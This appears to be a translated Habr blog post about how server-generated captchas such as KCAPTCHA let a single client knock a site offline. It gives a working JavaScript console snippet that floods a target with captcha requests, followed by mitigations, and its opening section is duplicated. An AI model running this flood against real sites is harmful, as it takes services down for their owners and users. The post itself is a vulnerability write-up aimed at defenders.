DoS-attack on sites with their own caps
You can find a lot of sites that are protected from all sorts of external unwanted automatic activity (bots) using captchas. And in many cases, the very same server on which the site is located is generating these captchas. To attach such a captcha to the site is very simple, and there are free captcha-generating libraries ( KCAPTCHA , for example).
What is the danger?
If there is a possibility that your site will have enemies (for example, you are the owner of www.piratepay.ru ), then using such a captcha you risk to help them a lot - it becomes very easy to disable the site using even one client computer.
')
Captcha generation is quite resource-intensive, especially if you consider that PHP (or another language that is not very suitable for image processing) does this.
For example, in the above-mentioned KCAPTCHA, a picture is assembled from fragments of a pre-rasterized font (which is stored as an image), for example:
In total, there are several such font files (in the standard “delivery” - 22), with each request a directory is searched and one of the files is selected randomly.
After pasting randomly selected characters, they are distorted. In this case, the wave distortion filter is used, written in PHP + GD2.
Those. it all happens rather slowly. No default caching is provided. The same applies to many other libraries (including the forum ones: phpBB, vBulletin, etc.)
If there are a lot of requests for captcha generation, the server will not have time to draw captcha and give ordinary pages (especially considering that the site most often works on some CMS and caching is turned off for various reasons).
In the simplest case, it is enough to go to the site in your favorite browser (so that just in case the referer was correct), open the javascript debugger and write something like this to the console:
As a result, we got a multithreaded download of an infinite number of captchas for free (with their generation on a poor server). It is clear that not every server will withstand this, many (from voluntarily tested) fall out with HTTP Error 503 Service unavailable.
To prevent this kind of attack, there are several obvious ways:
PS do not use "forum" captchas at all, because they are very weak - replace them with reCaptcha; if you use text captchas, make sure that the number of options is large enough.
What is the danger?
If there is a possibility that your site will have enemies (for example, you are the owner of www.piratepay.ru ), then using such a captcha you risk to help them a lot - it becomes very easy to disable the site using even one client computer.
')
Why?
Captcha generation is quite resource-intensive, especially if you consider that PHP (or another language that is not very suitable for image processing) does this.
For example, in the above-mentioned KCAPTCHA, a picture is assembled from fragments of a pre-rasterized font (which is stored as an image), for example:
In total, there are several such font files (in the standard “delivery” - 22), with each request a directory is searched and one of the files is selected randomly.
After pasting randomly selected characters, they are distorted. In this case, the wave distortion filter is used, written in PHP + GD2.
for($x=0;$x<$width;$x++){ for($y=0;$y<$height;$y++){ $sx=$x+(sin($x*$rand1+$rand5)+sin($y*$rand3+$rand6))*$rand9-$width/2+$center+1; $sy=$y+(sin($x*$rand2+$rand7)+sin($y*$rand4+$rand8))*$rand10; if($sx<0 || $sy<0 || $sx>=$width-1 || $sy>=$height-1){ continue; }else{ $color=imagecolorat($img, $sx, $sy) & 0xFF; $color_x=imagecolorat($img, $sx+1, $sy) & 0xFF; $color_y=imagecolorat($img, $sx, $sy+1) & 0xFF; $color_xy=imagecolorat($img, $sx+1, $sy+1) & 0xFF; } /* ... */ imagesetpixel($img2, $x, $y, imagecolorallocate($img2, $newred, $newgreen, $newblue)); } } Those. it all happens rather slowly. No default caching is provided. The same applies to many other libraries (including the forum ones: phpBB, vBulletin, etc.)
If there are a lot of requests for captcha generation, the server will not have time to draw captcha and give ordinary pages (especially considering that the site most often works on some CMS and caching is turned off for various reasons).
Attack
In the simplest case, it is enough to go to the site in your favorite browser (so that just in case the referer was correct), open the javascript debugger and write something like this to the console:
cnt = document.getElementById('content'); /* id */ regen = function() { var html = ''; for (var i = 0; i < 1000; i++) { html += '<img src="http://www.somesite.com/kcaptcha/index.php?' /* */ + Math.random() + '" />'; } cnt.innerHTML = html; }; window.setInterval(regen, 10 * 1000); regen(); /* — , , */ window.setInterval('window.scrollTo(0, document.body.scrollHeight);', 500); As a result, we got a multithreaded download of an infinite number of captchas for free (with their generation on a poor server). It is clear that not every server will withstand this, many (from voluntarily tested) fall out with HTTP Error 503 Service unavailable.
Conclusion
To prevent this kind of attack, there are several obvious ways:
- use reCaptcha
- check the number of captcha requests from each IP address, with the same session ID, etc.
- keep a certain number of generated captcha in the cache (100, 1000, ... - depends on the number of requests), give them through something fast (nginx), periodically rebuild the cache
- use robust text captchas, preferably tailored to the specifics of your site (for example, sin (30 °) = ...)
- your option
PS do not use "forum" captchas at all, because they are very weak - replace them with reCaptcha; if you use text captchas, make sure that the number of options is large enough.
Source: https://habr.com/ru/post/144427/
All Articles